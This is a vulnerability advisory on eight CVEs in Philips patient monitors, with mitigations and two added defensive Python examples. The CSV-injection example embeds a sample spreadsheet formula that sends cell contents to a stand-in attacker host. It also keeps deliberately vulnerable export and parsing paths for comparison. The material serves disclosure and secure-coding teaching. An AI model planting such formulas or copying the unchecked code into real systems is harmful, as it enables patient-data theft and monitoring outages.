Eight vulnerabilities of low to moderate severity have been found in Philips patient monitoring equipment. Successful exploitation could result in disclosure of patient data, denial of service, interrupted patient monitoring, and escape from a restricted environment with limited privileges.
The following Philips patient monitoring products are affected:
- PerformanceBridge Focal Point, version A.01
- IntelliVue X3 and X2, versions N and prior
- Patient Information Center iX (PICiX), versions B.02, C.02, and C.03
- IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90, versions N and prior
The 8 Vulnerabilities Identified
CVE-2020-16212 with a CVSS base score of 6.8/10; rated as Moderate Severity. A resource is exposed to the wrong control sphere, so an unauthorized person could use it to escape the restricted environment with limited privileges. Exploitation requires physical access to an unsecured device.
CVE-2020-16214 with a CVSS base score of 4.2/10; rated as Moderate Severity. User-provided data is saved to a CSV file without neutralizing special elements, so a value can be interpreted as a formula or command when the file is opened in spreadsheet software (CSV formula injection).
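The CSV formula-injection weakness described above, as an added example that is not Philips code: a minimal neutralizer for exported cells, with the vulnerable write path kept selectable so the two outputs can be compared. The column names, the export rows and the `neutralize` toggle are constructed for illustration.

```python
"""Neutralizing formula elements in user-supplied data before it is written
to CSV (CWE-1236, the weakness class behind CVE-2020-16214).
Added example, not Philips code; the sample rows are constructed."""
import csv
import io

# Leading characters that spreadsheet applications interpret as the start of
# a formula. Tab and carriage return are included because some applications
# still evaluate "=..." after a leading control character.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True if a spreadsheet would try to evaluate this cell."""
    return str(value).startswith(FORMULA_PREFIXES)


def neutralize_cell(value):
    """Return the cell as text that a spreadsheet will not evaluate.

    A leading apostrophe makes Excel and LibreOffice treat the cell as a
    literal string; csv.writer handles quoting of embedded delimiters and
    quote characters, so a value cannot break out into a neighbouring cell.
    """
    text = str(value)
    return "'" + text if is_formula_like(text) else text


def write_csv_rows(rows, neutralize=True):
    """Serialize rows to CSV text. neutralize=False reproduces the flaw."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if neutralize else c for c in row])
    return buf.getvalue()


# Constructed export: the "Note" field is free text entered by a user and
# carries a formula that would send the contents of cell A1 to a remote host.
SAMPLE_ROWS = [
    ["Bed", "Note"],
    ["ICU-04", '=HYPERLINK("http://attacker.example/?"&A1,"open")'],
    ["ICU-05", "-2 mmHg drift since calibration"],
]

if __name__ == "__main__":
    print("vulnerable export:\n" + write_csv_rows(SAMPLE_ROWS, neutralize=False))
    print("neutralized export:\n" + write_csv_rows(SAMPLE_ROWS))
```

Apply the neutralizer to free-text columns only: a negative number in a numeric column is also caught (the third constructed row shows this), so typed columns are better validated against their expected format at input time than prefixed on export. The apostrophe protects desktop spreadsheet import; it does nothing for a downstream consumer that runs its own formula engine over the file.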
CVE-2020-16216 with a CVSS base score of 6.5/10; rated as Moderate Severity. The device does not validate, or incorrectly validates, input to ensure it has the properties required for safe processing. Exploitation can cause a denial of service through a system restart.
CVE-2020-16218 with a CVSS base score of 3.5/10; rated as Low Severity. The product does not neutralize user-controllable input before placing it in output that is served as a web page to other users (cross-site scripting). Exploitation could give an attacker read-only access to patient information.
CVE-2020-16220 with a CVSS base score of 3.5/10; rated as Low Severity. The product does not validate, or incorrectly validates, that input conforms to the expected syntax. Exploitation could cause the system to crash.
CVE-2020-16222 with a CVSS base score of 5.0/10; rated as Moderate Severity. When an actor claims a given identity, the software does not adequately verify that claim, potentially allowing unauthorized access to data.
CVE-2020-16224 with a CVSS base score of 6.5/10; rated as Moderate Severity. When the software parses a formatted message or structure, it does not handle, or incorrectly handles, a length field that is inconsistent with the actual length of the associated data. This can cause the application on the surveillance station to restart, interrupting monitoring.
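The length-field inconsistency described above, as an added example that is neither Philips code nor the monitoring protocol: a parser for a hypothetical type/length/payload frame that validates the declared length before using it, beside an unchecked version that shows the failure mode. The frame layout, the `MAX_PAYLOAD` limit and the sample byte strings are constructed for illustration.

```python
"""Handling a length field that disagrees with the actual data (CWE-130,
the weakness class behind CVE-2020-16224). Added example; the frame format
(1-byte type, 2-byte big-endian length, payload) is hypothetical and the
sample byte strings are constructed."""
import struct

HEADER = struct.Struct(">BH")  # message type (uint8), payload length (uint16)
MAX_PAYLOAD = 4096             # assumed receiver-side bound on any payload


class FrameError(ValueError):
    """Malformed frame. The caller drops the frame and keeps running instead
    of letting the inconsistency propagate into a crash or application restart."""


def parse_frame_unchecked(buf, offset=0):
    """Trusts the declared length: the failure mode.

    If the length is larger than the data present, the payload is silently
    truncated and the returned offset points past the end of the buffer; if
    smaller, trailing bytes are left behind and misparsed as the next frame.
    """
    mtype, length = HEADER.unpack_from(buf, offset)
    start = offset + HEADER.size
    return mtype, buf[start:start + length], start + length


def parse_frame(buf, offset=0):
    """Validate the header and the declared length before touching the payload."""
    available = len(buf) - offset
    if available < HEADER.size:
        raise FrameError("short header: %d byte(s) available" % available)
    mtype, length = HEADER.unpack_from(buf, offset)
    if length > MAX_PAYLOAD:
        raise FrameError("declared length %d exceeds limit %d" % (length, MAX_PAYLOAD))
    present = available - HEADER.size
    if length > present:
        raise FrameError("declared length %d but only %d payload bytes present"
                         % (length, present))
    start = offset + HEADER.size
    return mtype, buf[start:start + length], start + length


def parse_stream(buf):
    """Split a byte string into (type, payload) frames.

    Returns the frames parsed so far and an error string (or None); a
    malformed frame stops parsing rather than aborting the process.
    """
    frames, offset = [], 0
    while offset < len(buf):
        try:
            mtype, payload, offset = parse_frame(buf, offset)
        except FrameError as exc:
            return frames, str(exc)
        frames.append((mtype, payload))
    return frames, None


# Constructed inputs: a well-formed stream of two frames, and one frame whose
# header claims 16 payload bytes while only 3 follow.
GOOD_STREAM = b"\x01\x00\x03abc" + b"\x02\x00\x01x"
BAD_LENGTH = b"\x01\x00\x10abc"

if __name__ == "__main__":
    print(parse_stream(GOOD_STREAM))
    print(parse_frame_unchecked(BAD_LENGTH))  # truncated payload, offset past end of buffer
    print(parse_stream(BAD_LENGTH))
```

The order of the checks matters: the upper bound on the declared length is tested before any allocation or comparison against the buffer, so a header claiming the maximum length cannot drive a large read or allocation, and a frame that fails validation is reported and skipped rather than being allowed to take the whole receiver down.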
CVE-2020-16228 with a CVSS base score of 6.0/10; rated as Moderate Severity. The software does not check, or incorrectly checks, a certificate's revocation status, which may allow a compromised certificate to be used.
Security researchers at ERNW Research GmbH and ERNW Enno Rey Netzwerke GmbH discovered the vulnerabilities and reported them to Philips. Philips in turn reported them to CISA and other federal agencies under its coordinated vulnerability disclosure policy.
Philips has received no reports of exploitation in the wild and plans to issue updates beginning in 2020. In the meantime, it advises users to apply the following mitigations to reduce the risk of exploitation:
- Physically or logically isolate the patient monitoring network from the hospital local area network (LAN).
- Use access control lists that restrict traffic into and out of the patient monitoring network to the required ports and IP addresses.
- Disable the SCEP service when it is not actively being used to register new devices.
- When registering new devices with SCEP, use a unique, randomly generated challenge password of 8 to 12 digits.
- Physically secure the devices to prevent unauthorized login attempts, and keep servers in secured data centers.
- Control physical access to patient monitors located at nurses' stations.
- Enable remote access to PIC iX servers only when it is actually needed, and disable it afterwards.
- Follow the principle of least privilege and allow only trusted users to access bedside monitors.
Users should contact their local or regional Philips service support team for information on upgrading vulnerable patient monitoring devices and implementing these mitigations.